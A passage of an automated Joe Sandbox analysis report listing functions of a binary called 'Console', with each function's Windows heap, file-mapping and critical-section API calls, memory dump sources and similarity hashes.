                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strncpy
                                                                                                                                                                                                                          • String ID: ENTRY_ASSEMBLY_NAME
                                                                                                                                                                                                                          • API String ID: 3654647765-1484239926
                                                                                                                                                                                                                          • Opcode ID: d7d2a7d55d81ba354907870df0bff946a0b1b5c01a0d1934fe91ef50429937e3
                                                                                                                                                                                                                          • Instruction ID: 983eae685ad9cc13b9858a3cbec3285646d3118420309e4f450cec012e1ba25f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7d2a7d55d81ba354907870df0bff946a0b1b5c01a0d1934fe91ef50429937e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23918975A502469BEB24CFA9DD44BEEBBF5EF48710F14812DEA15B3390DB759800CBA0
                                                                                                                                                                                                                          Function 011364F0 Relevance: 9.2, APIs: 6, Instructions: 221memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,7CAB6A82,00000001,00000000,00000000), ref: 01136570
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01136608
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01136646
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 011366C8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 0113698C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$FromProg
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1545854226-0
                                                                                                                                                                                                                          • Opcode ID: 2fb559240fb79e9bf132602b6d5d21860e4c23be66f10f168d80cc0b7046bb79
                                                                                                                                                                                                                          • Instruction ID: 065c908ec50af12c22b3c6d15b38aeb770b0f3b764b4986ec096a75c1f304a94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fb559240fb79e9bf132602b6d5d21860e4c23be66f10f168d80cc0b7046bb79
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7681C3B0A00258EFEB25CF99DC48BEEBBB8FB54754F1041A9D905A7298D7745E44CF80
                                                                                                                                                                                                                          Function 012DAA30 Relevance: 9.2, APIs: 6, Instructions: 161memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012DAA6D
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000000C), ref: 012DAA8A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 012DABE6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocFreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2113670309-0
                                                                                                                                                                                                                          • Opcode ID: 2c710c75eb4505adac95e31e5555d11d0e9cd205a334c724e84680edf77b8ea2
                                                                                                                                                                                                                          • Instruction ID: 3d8dd50986540f6ef798befcca1cf3933daab194dd7ac864afa43436c095192a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c710c75eb4505adac95e31e5555d11d0e9cd205a334c724e84680edf77b8ea2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05510170A102029FEB209F6DCD44FAABBE6AF64710F15856DEA05DB360E7B0D412CB91
                                                                                                                                                                                                                          Function 012D1A90 Relevance: 9.2, APIs: 6, Instructions: 151memorythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 012D1B39
                                                                                                                                                                                                                          • GetCurrentProcessorNumberEx.KERNEL32(00000000,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?,00000000,00000000), ref: 012D1B4F
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?,00000000,00000000,?), ref: 012D1B7C
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000058,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?), ref: 012D1B99
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002,?,00000000), ref: 012D1BC4
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000002,?,?,?,?,012D3497,00000002), ref: 012D1C05
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Current$AllocCounterFreeNumberPerformanceProcessProcessorQueryThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 579788346-0
                                                                                                                                                                                                                          • Opcode ID: 7239b458701473f83fee90266b47becaa90a9f3bef1244414cdad8681dee4cf2
                                                                                                                                                                                                                          • Instruction ID: 882c29f6a6613d9a707e06cdcda24e07f45e365192fc4055934b1388da6a7c45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7239b458701473f83fee90266b47becaa90a9f3bef1244414cdad8681dee4cf2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151BDB5A003059FDB20CFA9D984AAABBF4FF58311F01466EE909E7750E730A950CF90
                                                                                                                                                                                                                          Function 01228310 Relevance: 9.2, APIs: 6, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • iswspace.API-MS-WIN-CRT-STRING-L1-1-0(00000001,7CAB6A82,0164A018,00000001,00000001), ref: 01228355
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 01228392
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000008), ref: 012283AF
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000), ref: 01228424
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,?,00000000), ref: 0122844A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0122849C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess$Freeiswspace
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 496381148-0
                                                                                                                                                                                                                          • Opcode ID: 7d5cfbfa9108f72ac6c3db1608f76aac7354a6470c8fa0bbe38f0225afce07d3
                                                                                                                                                                                                                          • Instruction ID: 07cbe163e1475b988edd11f0989ed530b327d11d50f76082815f7f7689a92cf4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d5cfbfa9108f72ac6c3db1608f76aac7354a6470c8fa0bbe38f0225afce07d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34517B70A1021AAFDB21DFA9DD88BAAB7F8EF58711F1001ADE909E7350DB349940CF50
                                                                                                                                                                                                                          Function 012A5A80 Relevance: 9.1, APIs: 6, Instructions: 142memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 012A5AD9
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000FF8,00000000,?,00000000), ref: 012A5AF4
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012A5B46
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000000C), ref: 012A5B5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                          • Opcode ID: 87f3718967c966750e9fe722e21e2ec0e276445d6b4c7caf052885a31ad7c9b3
                                                                                                                                                                                                                          • Instruction ID: 9eeceb8e307b941c69a50d82dfecc5247cd8d4a75e893dae2cc89b5f6f138d67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87f3718967c966750e9fe722e21e2ec0e276445d6b4c7caf052885a31ad7c9b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 925141727103029BE721DF28D844B1BBBD4AB84726F10862DFA88DF391EB75D840CB90
                                                                                                                                                                                                                          Function 00FF3A60 Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000004,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3AD3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000020,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3B0C
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(-0000003C,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3B45
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(-0000003C,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3B7F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000020,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3BB9
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000004,?,7CAB6A82,?,00000000,?,7CAB6A82,?), ref: 00FF3BF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 166494926-0
                                                                                                                                                                                                                          • Opcode ID: 331c0c07033df6bbe724757e3e76af675bbd8d6296c7ff61095a7150bfec7496
                                                                                                                                                                                                                          • Instruction ID: e9c2489652936110ea6c2a9ca6658e3cd0d2e9260be85422e540066cd4ec478c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331c0c07033df6bbe724757e3e76af675bbd8d6296c7ff61095a7150bfec7496
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD51C670500249DFDB11DF65C88ABAEBBB4EF60314F40019CE541D73A1D778A659EBD1
                                                                                                                                                                                                                          Function 0141B240 Relevance: 9.1, APIs: 6, Instructions: 136fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7CAB6A82), ref: 0141B31A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B330
                                                                                                                                                                                                                          • MapViewOfFileEx.KERNEL32(00000000,00000006,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,7CAB6A82), ref: 0141B361
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B36D
                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B379
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000024,?,?,?,?,?,?,?,?,?,7CAB6A82,?,00000000), ref: 0141B389
                                                                                                                                                                                                                            • Part of subcall function 01219520: GetLastError.KERNEL32(01224192,0164A1AC,00000002,?,?,01223D1E,?), ref: 01219520
                                                                                                                                                                                                                            • Part of subcall function 012195C0: HeapFree.KERNEL32(00000000,0150E144,00000002,00000002,7CAB6A82), ref: 01219692
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLast$View$CloseCreateFreeHandleHeapMappingUnmap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 610960497-0
                                                                                                                                                                                                                          • Opcode ID: 0aa54210b154d05397b14594c8b491d2cd420d2545301e9a284516756cead0d4
                                                                                                                                                                                                                          • Instruction ID: 81355996fc39bf81d68d351b787ebf7c44113608bff49b40620e77f43f4e0f85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aa54210b154d05397b14594c8b491d2cd420d2545301e9a284516756cead0d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F5158B0500709DFEB20DF69C948B9ABBF0FB04714F108A1DE965AB7E4D7B5A514CB90
                                                                                                                                                                                                                          Function 012A3830 Relevance: 9.1, APIs: 6, Instructions: 62memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,012A2D67,?,0127EF74,7CAB6A82,00000000,8007000E,00000000,00000000,014F12B5,000000FF,?,012A5B94), ref: 012A384C
                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,00000000,?,00000000,012A2D67,?,0127EF74,7CAB6A82,00000000,8007000E,00000000,00000000,014F12B5,000000FF,?,012A5B94), ref: 012A3867
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,012A5B94), ref: 012A3870
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,012A2D67,?,0127EF74,7CAB6A82,00000000,8007000E,00000000,00000000,014F12B5,000000FF), ref: 012A3893
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,-00000001,00004000,?,?,?,?,?,?,?,?,?,?,?,?,012A5B94), ref: 012A38BB
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,012A5B94), ref: 012A38CA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$HeapVirtual$CloseFileHandleUnmapView
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3290427157-0
                                                                                                                                                                                                                          • Opcode ID: 0da43edc68c084404cfbe0bf544d761fdaa508aa1d58956cdc7c62c765440083
                                                                                                                                                                                                                          • Instruction ID: f07aa986425126fd9547c14f18c374b115619962300b816df4d67efcd1938bbd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0da43edc68c084404cfbe0bf544d761fdaa508aa1d58956cdc7c62c765440083
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F218170310602FFEB28CF25DD49BA1BBB6FF40702F54411CE20197AA4DBB5A465CB91
                                                                                                                                                                                                                          Function 00FC6CF0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(0150E144,00000002,00000000,00000001,00000003,00000000,7CAB6A82), ref: 00FC6E0D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,00000002,7CAB6A82), ref: 00FC6EED
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(0150E144,00000002,DefaultDomain,0000000D,00000004,00000000,7CAB6A82), ref: 00FC6FBD
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,?), ref: 00FC7084
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_swcscpy_s
                                                                                                                                                                                                                          • String ID: DefaultDomain
                                                                                                                                                                                                                          • API String ID: 1182151116-1885726810
